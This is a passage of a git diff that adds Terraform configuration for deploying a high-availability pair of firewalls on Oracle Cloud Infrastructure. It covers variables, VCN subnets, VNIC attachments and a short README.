+ description = "IP address for the fw1 ha2 interface"
+}
+variable "fw2_ha2_ip" {
+ description = "IP address for the fw2 ha2 interface"
+}
+variable "web_cidr" {
+ description = "CIDR block for the web subnet"
+}
+variable "web1_ip" {
+ description = "ip adress for web1"
+}
+variable "server_shape_size" {
+ description = "shape size for the server"
+}
+variable "ubuntu_image_ocid" {
+ type = "map"
+ default = {
+ ap-melbourne-1 = "ocid1.image.oc1.ap-melbourne-1.aaaaaaaajdcf2heyxkmgvdtbbczu74cl6qbc5gxew56c3y3q6dbjsul6b6aq"
+ ap-mumbai-1 = "ocid1.image.oc1.ap-mumbai-1.aaaaaaaayjxakga6uhq3dcprkziczfnoug5rpwjqfot6s6lteuylbcjv4bya"
+ ap-osaka-1 = "ocid1.image.oc1.ap-osaka-1.aaaaaaaapc4kllvk4vib7fhnug7ukm2txuhitdrfhyt7sickogqt7iswvfqq"
+ ap-seoul-1 = "ocid1.image.oc1.ap-seoul-1.aaaaaaaazrfma7gwjj36m7vcxeork2azxshoymo4zbi5jfti6zqvcmopix7a"
+ ap-sydney-1 = "ocid1.image.oc1.ap-sydney-1.aaaaaaaauskrlywocekwttksypjq5imxevgpfayhfgobemmdio2e42nj5hrq"
+ ap-tokyo-1 = "ocid1.image.oc1.ap-tokyo-1.aaaaaaaa3rhjibflbzqbloypnpxegzyxxni2wyllbbilhzowvcja3iz7h4sq"
+ ca-montreal-1 = "ocid1.image.oc1.ca-montreal-1.aaaaaaaainz6oiqrgokqfvxpbfwciswg3hjsbno4dlmxkwtl6v6e6tjrsz5a"
+ ca-toronto-1 = "ocid1.image.oc1.ca-toronto-1.aaaaaaaatkqz6qc7iojynkffjs75jrvqnxnvycdusat4v3iiea25zb2kftta"
+ eu-amsterdam-1 = "ocid1.image.oc1.eu-amsterdam-1.aaaaaaaabp7qk76ijyrminiue2m3biqjfz4dzpfdrdtg5cv2me2gyuptanpq"
+ eu-frankfurt-1 = "ocid1.image.oc1.eu-frankfurt-1.aaaaaaaaztrgnqdk6lctht72zn4wjpy6fpaacarblsrl74dq2vnzgipctgeq"
+ eu-zurich-1 = "ocid1.image.oc1.eu-zurich-1.aaaaaaaaoj3jvr57jyg5ugeb2oyxr3vdrqt47mls66j3nhb7xjtmlokcdchq"
+ me-jeddah-1 = "ocid1.image.oc1.me-jeddah-1.aaaaaaaaa7crfvj23zizibv4n2dne4uc3ksw35judghweftep4mdtlcdmdwa"
+ sa-saopaulo-1 = "ocid1.image.oc1.sa-saopaulo-1.aaaaaaaabraq4wsw67oivaicttnmw6oegizim3pb5abxzoj63uzfxxhahuqa"
+ uk-gov-london-1 = "ocid1.image.oc4.uk-gov-london-1.aaaaaaaafxczrxrlkccsbyaa2ertdehkpqttx73zwzeq75bowbklsp2pqi2a"
+ uk-london-1 = "ocid1.image.oc1.uk-london-1.aaaaaaaa276jkgmoibf3teixw7olzx4oa64bakbj5qaewwxtfwwpenxcf3jq"
+ us-ashburn-1 = "ocid1.image.oc1.iad.aaaaaaaa6x4mvi4tkiigibgtovqbinjnmr4qibuygpkifitgd5b7knjni7fq"
+ us-langley-1 = "ocid1.image.oc2.us-langley-1.aaaaaaaa65aorjlfq342p2rcjl5afekasasjsrvimqcb7jrjbu5yyyabdvbq"
+ us-luke-1 = "ocid1.image.oc2.us-luke-1.aaaaaaaaqgziggzzcow75qwnsovoooxioawzuczpmewiom2ljpf4ywey4dsq"
+ us-phoenix-1 = "ocid1.image.oc1.phx.aaaaaaaagmkn4gdhvvx24kiahh2b2qchsictjjnujfw7vtytftmvnteyfckq"
+ }
+}
+variable "server_availability_domain" {
+ description = "AD size for the server"
+}
\ No newline at end of file
diff --git a/oci/HA/vcn_subnets.tf b/oci/HA/vcn_subnets.tf
new file mode 100644
index 00000000..6b67c410
--- /dev/null
+++ b/oci/HA/vcn_subnets.tf
@@ -0,0 +1,46 @@
+resource "oci_core_vcn" "vcn" {
+ cidr_block = "${var.vcn_cidr}"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ display_name = "VCN-PANW"
+}
+resource "oci_core_subnet" "management" {
+ cidr_block = "${var.management_cidr}"
+ display_name = "mgmt"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ route_table_id = "${oci_core_route_table.public.id}"
+ security_list_ids = ["${oci_core_security_list.management.id}"]
+}
+resource "oci_core_subnet" "untrust" {
+ cidr_block = "${var.untrust_cidr}"
+ display_name = "untrust"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ route_table_id = "${oci_core_route_table.public.id}"
+ security_list_ids = ["${oci_core_security_list.untrust.id}"]
+}
+resource "oci_core_subnet" "trust" {
+ cidr_block = "${var.trust_cidr}"
+ display_name = "trust"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ security_list_ids = ["${oci_core_security_list.trust.id}"]
+ prohibit_public_ip_on_vnic = true
+}
+resource "oci_core_subnet" "ha2" {
+ cidr_block = "${var.ha2_cidr}"
+ display_name = "HA2"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ security_list_ids = ["${oci_core_security_list.trust.id}"]
+ prohibit_public_ip_on_vnic = true
+}
+resource "oci_core_subnet" "web" {
+ cidr_block = "${var.web_cidr}"
+ display_name = "web"
+ compartment_id = "${oci_identity_compartment.compartment.id}"
+ vcn_id = "${oci_core_vcn.vcn.id}"
+ route_table_id = "${oci_core_route_table.web.id}"
+ security_list_ids = ["${oci_core_security_list.web.id}"]
+ prohibit_public_ip_on_vnic = true
+}
\ No newline at end of file
diff --git a/oci/HA/vnics.tf b/oci/HA/vnics.tf
new file mode 100644
index 00000000..cab888d5
--- /dev/null
+++ b/oci/HA/vnics.tf
@@ -0,0 +1,82 @@
+resource "oci_core_vnic_attachment" "firewall1_untrust" {
+ instance_id = "${oci_core_instance.firewall1.id}"
+ display_name = "firewall1_untrust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.untrust.id}"
+ private_ip = "${var.fw1_untrust_ip}"
+ display_name = "untrust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.untrust.id}"]
+ }
+}
+resource "oci_core_vnic_attachment" "firewall1_trust" {
+ instance_id = "${oci_core_instance.firewall1.id}"
+ display_name = "firewall1_trust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.trust.id}"
+ private_ip = "${var.fw1_trust_ip}"
+ display_name = "trust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.trust.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall1_untrust"]
+}
+resource "oci_core_vnic_attachment" "firewall1_ha2" {
+ instance_id = "${oci_core_instance.firewall1.id}"
+ display_name = "firewall1_ha2"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.ha2.id}"
+ private_ip = "${var.fw1_ha2_ip}"
+ display_name = "ha2"
+ assign_public_ip = false
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.ha.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall1_trust"]
+}
+resource "oci_core_vnic_attachment" "firewall2_untrust" {
+ instance_id = "${oci_core_instance.firewall2.id}"
+ display_name = "firewall2_untrust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.untrust.id}"
+ private_ip = "${var.fw2_untrust_ip}"
+ display_name = "untrust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.untrust.id}"]
+ }
+}
+resource "oci_core_vnic_attachment" "firewall2_trust" {
+ instance_id = "${oci_core_instance.firewall2.id}"
+ display_name = "firewall2_trust"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.trust.id}"
+ private_ip = "${var.fw2_trust_ip}"
+ display_name = "trust"
+ assign_public_ip = false
+ skip_source_dest_check = true
+ #nsg_ids = ["${oci_core_network_security_group.trust.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall2_untrust"]
+}
+resource "oci_core_vnic_attachment" "firewall2_ha2" {
+ instance_id = "${oci_core_instance.firewall2.id}"
+ display_name = "firewall2_ha2"
+
+ create_vnic_details {
+ subnet_id = "${oci_core_subnet.ha2.id}"
+ private_ip = "${var.fw2_ha2_ip}"
+ display_name = "ha2"
+ assign_public_ip = false
+ skip_source_dest_check = false
+ #nsg_ids = ["${oci_core_network_security_group.ha.id}"]
+ }
+ depends_on = ["oci_core_vnic_attachment.firewall2_trust"]
+}
\ No newline at end of file
diff --git a/oci/README.md b/oci/README.md
new file mode 100644
index 00000000..073864b0
--- /dev/null
+++ b/oci/README.md
@@ -0,0 +1 @@
+Terraform for OCI